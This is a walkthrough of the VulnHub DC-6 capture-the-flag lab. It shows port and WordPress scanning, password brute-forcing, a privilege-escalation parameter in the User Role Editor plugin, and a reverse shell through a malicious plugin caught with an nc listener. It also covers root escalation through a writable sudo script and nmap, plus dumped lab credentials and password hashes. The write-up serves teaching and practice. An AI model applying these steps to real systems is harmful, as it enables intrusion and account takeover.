DC-6 Walkthrough

Walkthrough of DC-6 challenge from vulnhub. Initial hints given from reviewing the challenge listing:

  • The name of the host is wordy
  • A password list can be determined using cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Walkthrough

A basic ping sweep finds the machine, throwing a default nmap scan at it finds two ports of interest – SSH (22) & HTTP (80). Of interest in the http headers are the mention of hostname wordy (inline with the initial hint)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:C3:AD:DB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

Wordy added to the /etc/hosts file & off to have a look at the website

A quick browse through the website shows it to be a fairly basic WordPress site. Checking it with wpscan reveals a few things of use.

root@kali:/var/www/html# wpscan --url http://wordy
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://wordy/
[+] Started: Tue May 14 20:30:56 2019

[+] Interesting header: LINK: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://wordy/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.25 (Debian)
[+] XML-RPC Interface available under: http://wordy/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://wordy/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| admin |
+-------+
[!] Includes directory has directory listing enabled: http://wordy/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 5.1.1 (Released on 2019-03-13) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v2.1

[+] Name: twentyseventeen - v2.1
 |  Last updated: 2019-05-07T00:00:00.000Z
 |  Location: http://wordy/wp-content/themes/twentyseventeen/
 |  Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
[!] The version is out of date, the latest version is 2.2
 |  Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found passively

From looking at the initial output no obvious vulnerabilities are identified. Its a reasonably recent WordPress install with no detected plugins. As a next step brute force of the user accounts is attempted (command: wpscan –url http://wordy/ –wordlist /root/Documents/DC-6/passwords.txt) the login using the password list created from the hints.

[+] Enumerating usernames ...
[+] We identified the following 5 users:
    +----+--------+-----------------+
    | ID | Login  | Name            |
    +----+--------+-----------------+
    | 1  | admin  | admin           |
    | 2  | graham | Graham Bond     |
    | 3  | mark   | Mark Jones      |
    | 4  | sarah  | Sarah Balin     |
    | 5  | jens   | Jens Dagmeister |
    +----+--------+-----------------+
[!] Default first WordPress username 'admin' is still used
[+] Starting the password brute forcer
  Brute Forcing 'admin' Time: 00:00:50 <== > (2668 / 2669) 99.96%  ETA: 00:00:00
  Brute Forcing 'graham' Time: 00:00:39 <= > (2668 / 2669) 99.96%  ETA: 00:00:00
  [+] [SUCCESS] Login : mark Password : helpdesk01                              

  Brute Forcing 'sarah' Time: 00:00:40 <== > (2666 / 2669) 99.88%  ETA: 00:00:00
  Brute Forcing 'jens' Time: 00:00:46 <=== > (2663 / 2669) 99.77%  ETA: 00:00:00

  +----+--------+-----------------+------------+
  | ID | Login  | Name            | Password   |
  +----+--------+-----------------+------------+
  | 1  | admin  | admin           |            |
  | 2  | graham | Graham Bond     |            |
  | 3  | mark   | Mark Jones      | helpdesk01 |
  | 4  | sarah  | Sarah Balin     |            |
  | 5  | jens   | Jens Dagmeister |            |
  +----+--------+-----------------+------------+

Credentials for user mark successfully identified. Logging into the site finds user mark has a limited set of privileges. Reviewing the install shows a few plugins installed that the wpscan failed to pick up. One of interest is user role editor version 4.24. Researching the plugin version shows a low privilege user can exploit the plug to gain admin credentials – https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/.

Reviewing the sample exploit code at https://www.exploit-db.com/exploits/44595 & https://packetstormsecurity.com/files/147515/WordPress-User-Role-Editor-Plugin-Privilege-Escalation.html shows that HTTP POST parameter ure_other_roles=[“role1”, “role2”] can be added to a user update request to grant additional privileges role1 & role2 to the logged in user.

Target to get a low privilege shell on the box is via a custom malicious WordPress Plugin. To do this the logged in user needs to be able to upload and active new plugins. A review of https://codex.wordpress.org/Roles_and_Capabilities suggests the additional roles needed are:

  • activate_plugins
  • edit_plugins
  • install_plugins
  • delete_plugins
  • update_plugins
  • manage_network_plugins
  • upload_plugins

Profile update request sent with additional privileges added now lets our user upload plugins.

Loading the malicious plugin and activating it gives us a low privilege shell on the machine.

root@kali-2018:~/Documents/DC-6# nc -lvp 5556
listening on [any] 5556 ...
connect to [192.168.139.131] from wordy [192.168.139.134] 38870
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
 21:13:15 up  1:28,  0 users,  load average: 0.01, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
whoami
www-data
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname
uname
Linux
$ uname -a
uname -a
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
$ cat /etc/issue
cat /etc/issue
Debian GNU/Linux 9 \n \l

Browsing through the machine the following file of interest is identified.

$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

SSH into the box into the box using the username and password succeeds, now onto escalating privileges and the root flag.

Initial enumeration work as user graham identifies the following items of interest.

  • User graham can run the command /home/jens/backup.sh as user jens via sudo with no password.
  • User graham is in the devs group and can write to file /home/jens/backup.sh
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:~$ ls -al /home/jens/backups.sh
-rwxrwxr-x 1 jens devs 50 Apr 26 02:19 /home/jens/backups.sh
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)

This arrangement is dangerous – it allows one user (graham) to execute any command as another user (jens). Let’s do that.

Swapping out the contents of /home/jens/backups.sh with bin/bash and running it swaps us over to user jens. From there it’s confirmed user jens can run nmap as root with no password. This can be used to spawn a root shell (review https://gtfobins.github.io/gtfobins/nmap/ for how)

Root flag obtained .

Post-Exploitation

From enumerating the machine the following post-exploitation items of interest were identified. When attempting to crack hashes https://hashcat.net/wiki/doku.php?id=example_hashes is useful identify the type of hash.

#1 – Mysql database credentials:

define( 'DB_NAME', 'wordpressdb' );
/** MySQL database username */
define( 'DB_USER', 'wpdbuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'meErKatZ' );

#2 – WordPress password hashes. These were extracted using the credentials found at step # 1.

  • $P$BDhiv9Y.kOYzAN8XmDbzG00hpbb2LA1
  • $P$B/mSJ8xC4iPJAbCzbRXKilHMbSoFE41
  • $P$BdDI8ehZKO5B/cJS8H0j1hU1J9t810/
  • $P$BEDLXtO6PUnSiB6lVaYkqUIMO/qx.3/
  • $P$B//75HFVPBwqsUTvkBcHA8i4DUJ7Ru0

Running hashcat against the list so far only recovers the user password for mark (helpdesk01).

Leave a Reply